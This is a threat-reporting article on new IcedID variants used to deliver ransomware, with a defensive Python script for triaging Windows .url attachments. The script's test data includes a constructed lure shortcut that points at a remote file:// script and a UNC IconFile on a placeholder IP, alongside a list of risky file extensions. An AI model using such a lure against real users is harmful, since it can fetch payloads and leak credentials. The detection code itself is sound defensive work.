The IcedID malware has new variants that specialise in payload delivery rather than online banking fraud. Reports show that several threat actors have adopted the newly emerged variants in seven cybercriminal operations since last year, and researchers noted that the variants have chiefly been used to deliver ransomware.
The first newly identified IcedID variant is Lite.
According to investigations, IcedID Lite initially appeared in November last year. It was delivered as a second-stage payload on systems already infected with the Emotet malware.
Analysts revealed that Lite uses a hardcoded static URL to download a file containing a DLL loader. Unlike the standard IcedID loader, this variant does not check in with a command-and-control server, so it does not report data about the compromised device back to the operators.
Last month, the newly emerged TA581 cybercriminal group used the Forked version of IcedID. This version drops the banking fraud functionality, such as the backconnect module and web injects. Instead, the group, which operates as an initial access broker, used the variant to deploy the Bumblebee malware.
The Forked IcedID operators also use Microsoft OneNote attachments and unusual files with the .URL extension to deceive victims. Unlike Lite, however, the Forked variant keeps the standard IcedID loader behaviour of contacting a command-and-control server to download the DLL.
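Because the .URL lure is an unusual attachment type, it is worth having a quick triage step for it. The following script is an added example for this article, not code from the article or from the researchers it cites: it parses the INI-style body of a Windows Internet Shortcut (.url) file and flags the properties a lure tends to rely on. The heuristics (UNC or file:// targets, script or executable extensions, bare IP hosts, remote IconFile entries) and the two sample files are constructed for this example and are assumptions about what a malicious .url file looks like, not findings reported for the IcedID campaign.

```python
"""Triage Windows Internet Shortcut (.url) attachments.

Added example: heuristics and samples are constructed for illustration."""
import configparser
import re
from urllib.parse import urlparse

# Heuristic list chosen for this example; tune it for your environment.
RISKY_EXTENSIONS = (".exe", ".dll", ".js", ".jse", ".vbs", ".wsf", ".hta",
                    ".lnk", ".bat", ".cmd", ".ps1", ".msi", ".iso", ".img")
_IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def parse_url_file(text):
    """Parse the INI-style body of a .url file.

    Returns the [InternetShortcut] keys (lower-cased) as a dict, or None
    if the section is absent, i.e. the attachment is not really a .url file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    try:
        cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return {k.lower(): v.strip() for k, v in cp.items(section)}
    return None


def _is_unc(value):
    return value.startswith("\\\\")


def assess_url_shortcut(text):
    """Return {'verdict', 'target', 'reasons'} for one .url file body."""
    fields = parse_url_file(text)
    if fields is None:
        return {"verdict": "not-a-url-file", "target": None, "reasons": []}

    target = fields.get("url", "")
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    host = (parsed.hostname or "").lower()
    reasons = []

    # 1. Where does the shortcut actually go? A UNC or file:// target makes
    #    Windows fetch from a remote share and can leak NTLM credentials.
    if _is_unc(target) or scheme == "file":
        reasons.append("target is a UNC or file:// path (remote share fetch)")
        if _is_unc(target):
            host = target.lstrip("\\").split("\\", 1)[0].lower()
    elif scheme not in ("http", "https"):
        reasons.append(f"unexpected URL scheme {scheme or '<none>'!r}")

    # 2. Does the target name a file type a normal web link would not?
    path_part = target.split("?", 1)[0].split("#", 1)[0].lower()
    if path_part.endswith(RISKY_EXTENSIONS):
        reasons.append(f"target ends in a script/executable extension ({path_part.rsplit('.', 1)[-1]})")

    # 3. Bare IP addresses are common in hastily built lure infrastructure.
    if _IPV4.match(host):
        reasons.append(f"target host is a bare IPv4 address ({host})")

    # 4. A remote IconFile is fetched by Explorer when the file is merely
    #    rendered in a folder view, before the user clicks anything.
    icon = fields.get("iconfile", "")
    if _is_unc(icon) or icon.lower().startswith(("http://", "https://")):
        reasons.append("IconFile points at a remote location (fetched without a click)")

    return {"verdict": "suspicious" if reasons else "no-findings",
            "target": target, "reasons": reasons}


# Constructed samples for this example; not real lures from the campaign.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/docs/\r\n"
LURE_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://203.0.113.5/share/invoice.js\r\n"
    "IconFile=\\\\203.0.113.5\\share\\icon.ico\r\n"
    "IconIndex=0\r\n"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL_FILE), ("lure", LURE_URL_FILE)):
        result = assess_url_shortcut(body)
        print(name, result["verdict"], result["target"])
        for reason in result["reasons"]:
            print("  -", reason)
```

Run it on the raw bytes of each .url attachment decoded as text; anything with a verdict of "suspicious" is worth a closer look before the message reaches a mailbox, and the `reasons` list tells the analyst which property triggered.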
These new variants show that the malware's developers are actively upgrading IcedID. Many threat actors will therefore likely adopt it to make their attacks more efficient, and they will gain a reliable vehicle for deploying payloads, which could lead to more widespread ransomware distribution.
Researchers also believe that the original authors of Emotet may have teamed up with the IcedID operators to improve its capabilities further. This belief rests on the codebase, the timeline, and the correlation with recent Emotet infections worldwide.
Cooperation between the Emotet and IcedID authors could also produce newer variants with greater infection capabilities.
The new IcedID variants show that their authors can build tools specialising in a single purpose. Analysts and researchers should therefore remain vigilant about these attacks and develop more proactive countermeasures against them.